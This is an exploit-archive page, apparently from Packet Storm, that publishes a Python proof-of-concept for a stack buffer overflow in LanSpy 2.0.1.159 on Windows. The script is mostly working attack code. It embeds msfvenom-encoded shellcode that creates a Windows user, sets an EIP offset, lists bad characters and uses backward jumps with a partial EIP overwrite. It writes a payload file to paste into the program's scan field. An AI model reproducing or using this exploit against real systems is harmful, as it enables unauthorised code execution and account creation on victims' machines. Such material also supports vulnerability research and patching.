what you don't know can hurt you

LanSpy 2.0.1.159 Stack Buffer Overflow

LanSpy 2.0.1.159 Stack Buffer Overflow
Posted Jun 23, 2020
Authored by Paolo Stagno

LanSpy version 2.0.1.159 stack buffer overflow exploit that adds a user.

tags | exploit, overflow
MD5 | b0153a74496953acb5708e0d11dbf08d

LanSpy 2.0.1.159 Stack Buffer Overflow

Change Mirror Download
"""
Exploit title: LanSpy v.2.0.1.159 - Stack Buffer Overflow
Exploit Author: Paolo Stagno aka VoidSec - voidsec@voidsec.com - https://voidsec.com
Vendor Homepage: https://lizardsystems.com/
Download: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe
Version: v.2.0.1.159
Tested on: Windows 10 Pro x64 v.1909 Build 18363.418
Category: local exploits
Platform: windows
Usage: Open the APP > click on the scan field > paste the contents from the generated "LanSpy_v.2.0.1.159_exploit.txt" file
"""
#!/usr/bin/python
import os,subprocess,struct,platform
filename="LanSpy_v.2.0.1.159_exploit.txt"
EIP_offset = 680

"""
03F9FB48 start of our "junk" buffer
03F9FDDB end of not corruppted "junk" buffer
03F9FDDB - 03F9FB48 = 659 - 22 (pad+stack_adj) = 637 bytes for shellcode
"""

stack_adj = "\x83\xec\x78" * 10 # stack_adj; sub esp,0x78 (120*10=1200)
# BAD CHARS: \x00\x01\x02\x03\x04\x05\x06\x07\x09\x0a\x0b\x0c\x0d\x0f\x10\x11\x12\x13\x14\x1a\x1b\x1c\x1d\x1e\x1f\x2c
# msfvenom -p windows/adduser USER=VoidSec PASS=VoidSec1! -a x86 --platform windows -e x86/alpha_mixed -f python -v shellcode
# Payload size: 608 bytes
shellcode = b""
shellcode += b"\x89\xe2\xd9\xcf\xd9\x72\xf4\x5b\x53\x59\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43"
shellcode += b"\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50"
shellcode += b"\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += b"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38"
shellcode += b"\x41\x42\x75\x4a\x49\x79\x6c\x48\x68\x4e\x62"
shellcode += b"\x63\x30\x75\x50\x45\x50\x71\x70\x4e\x69\x4a"
shellcode += b"\x45\x46\x51\x39\x50\x65\x34\x4e\x6b\x42\x70"
shellcode += b"\x70\x30\x4c\x4b\x62\x72\x56\x6c\x6e\x6b\x50"
shellcode += b"\x52\x36\x74\x4c\x4b\x62\x52\x66\x48\x36\x6f"
shellcode += b"\x6e\x57\x53\x7a\x54\x66\x35\x61\x59\x6f\x4c"
shellcode += b"\x6c\x47\x4c\x30\x61\x33\x4c\x57\x72\x66\x4c"
shellcode += b"\x31\x30\x79\x51\x38\x4f\x66\x6d\x35\x51\x58"
shellcode += b"\x47\x6d\x32\x38\x72\x51\x42\x63\x67\x6e\x6b"
shellcode += b"\x63\x62\x42\x30\x4e\x6b\x52\x6a\x67\x4c\x4e"
shellcode += b"\x6b\x30\x4c\x72\x31\x74\x38\x39\x73\x42\x68"
shellcode += b"\x43\x31\x7a\x71\x36\x31\x4c\x4b\x50\x59\x31"
shellcode += b"\x30\x46\x61\x58\x53\x6e\x6b\x67\x39\x65\x48"
shellcode += b"\x58\x63\x47\x4a\x67\x39\x6e\x6b\x30\x34\x6e"
shellcode += b"\x6b\x63\x31\x78\x56\x70\x31\x39\x6f\x4c\x6c"
shellcode += b"\x6f\x31\x6a\x6f\x64\x4d\x53\x31\x6a\x67\x65"
shellcode += b"\x68\x6d\x30\x61\x65\x4b\x46\x66\x63\x63\x4d"
shellcode += b"\x69\x68\x75\x6b\x71\x6d\x44\x64\x50\x75\x68"
shellcode += b"\x64\x53\x68\x6c\x4b\x42\x78\x67\x54\x33\x31"
shellcode += b"\x5a\x73\x72\x46\x4e\x6b\x46\x6c\x72\x6b\x6c"
shellcode += b"\x4b\x70\x58\x77\x6c\x63\x31\x69\x43\x4c\x4b"
shellcode += b"\x65\x54\x6c\x4b\x36\x61\x4e\x30\x4c\x49\x37"
shellcode += b"\x34\x37\x54\x56\x44\x43\x6b\x51\x4b\x63\x51"
shellcode += b"\x31\x49\x33\x6a\x52\x71\x6b\x4f\x49\x70\x51"
shellcode += b"\x4f\x63\x6f\x71\x4a\x6e\x6b\x34\x52\x68\x6b"
shellcode += b"\x4e\x6d\x61\x4d\x30\x6a\x66\x61\x4e\x6d\x4f"
shellcode += b"\x75\x68\x32\x67\x70\x75\x50\x57\x70\x32\x70"
shellcode += b"\x72\x48\x66\x51\x6e\x6b\x42\x4f\x6f\x77\x39"
shellcode += b"\x6f\x39\x45\x6d\x6b\x68\x70\x38\x35\x39\x32"
shellcode += b"\x33\x66\x53\x58\x69\x36\x5a\x35\x6f\x4d\x6f"
shellcode += b"\x6d\x49\x6f\x79\x45\x75\x6c\x44\x46\x33\x4c"
shellcode += b"\x34\x4a\x6b\x30\x79\x6b\x4d\x30\x44\x35\x67"
shellcode += b"\x75\x4d\x6b\x30\x47\x36\x73\x34\x32\x70\x6f"
shellcode += b"\x63\x5a\x57\x70\x53\x63\x4b\x4f\x78\x55\x75"
shellcode += b"\x33\x70\x6d\x42\x44\x34\x6e\x65\x35\x61\x68"
shellcode += b"\x45\x35\x65\x70\x74\x6f\x45\x33\x51\x30\x52"
shellcode += b"\x4e\x63\x55\x31\x64\x71\x30\x31\x65\x51\x63"
shellcode += b"\x45\x35\x42\x52\x37\x50\x52\x76\x62\x4f\x43"
shellcode += b"\x59\x70\x64\x42\x73\x30\x65\x43\x53\x65\x70"
shellcode += b"\x30\x56\x42\x4f\x71\x79\x55\x34\x51\x43\x73"
shellcode += b"\x55\x65\x33\x46\x51\x57\x51\x37\x50\x76\x4f"
shellcode += b"\x63\x71\x42\x64\x42\x64\x77\x50\x75\x76\x46"
shellcode += b"\x46\x37\x50\x30\x6e\x31\x75\x54\x34\x77\x50"
shellcode += b"\x50\x6c\x50\x6f\x55\x33\x61\x71\x42\x4c\x75"
shellcode += b"\x37\x32\x52\x70\x6f\x64\x35\x62\x50\x35\x70"
shellcode += b"\x72\x61\x65\x34\x50\x6d\x62\x49\x70\x6e\x43"
shellcode += b"\x59\x72\x53\x64\x34\x53\x42\x31\x71\x53\x44"
shellcode += b"\x70\x6f\x64\x32\x64\x33\x65\x70\x71\x46\x32"
shellcode += b"\x4f\x55\x39\x63\x54\x33\x63\x72\x45\x52\x43"
shellcode += b"\x55\x70\x46\x4f\x43\x71\x42\x64\x52\x64\x35"
shellcode += b"\x50\x41\x41"

pad = "A" * 12
jmp_far = "\xe9\x5c\xfd\xff\xff" # JMP FAR BACKWARDS
jmp_short = "\x41\xeb\xf6\x41" # ECX point here ; JMP SHORT BACKWARDS
eip = "\xad\x40\x40" # EIP 0x004040ad : jmp ecx | startnull {PAGE_EXECUTE_READ} [lanspy.exe] ; partial overwrite to keep \x00 (that is a null byte)
# original nSEH and SEH below are left untouched
# nSEH
# SEH

payload = "A" * ( EIP_offset - len(stack_adj) - len(shellcode) - len(pad) - len(jmp_far) - len(jmp_short) ) + stack_adj + shellcode + pad + jmp_far + jmp_short + eip

f = open(filename, 'w')
f.write(payload)
f.close()

print("Wrote {} bytes".format(len(payload)))

ver = platform.machine()
if ver.endswith('64'):
debuggercmd = "C:\\Program Files (x86)\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe"
else:
debuggercmd = "C:\\Program Files\\Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe"
subprocess.call([debuggercmd,"C:\\Program Files (x86)\\LizardSystems\\LanSpy\\lanspy.exe",""])
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    35 Files
  • 8
    Jul 8th
    4 Files
  • 9
    Jul 9th
    9 Files
  • 10
    Jul 10th
    7 Files
  • 11
    Jul 11th
    4 Files
  • 12
    Jul 12th
    4 Files
  • 13
    Jul 13th
    14 Files
  • 14
    Jul 14th
    17 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close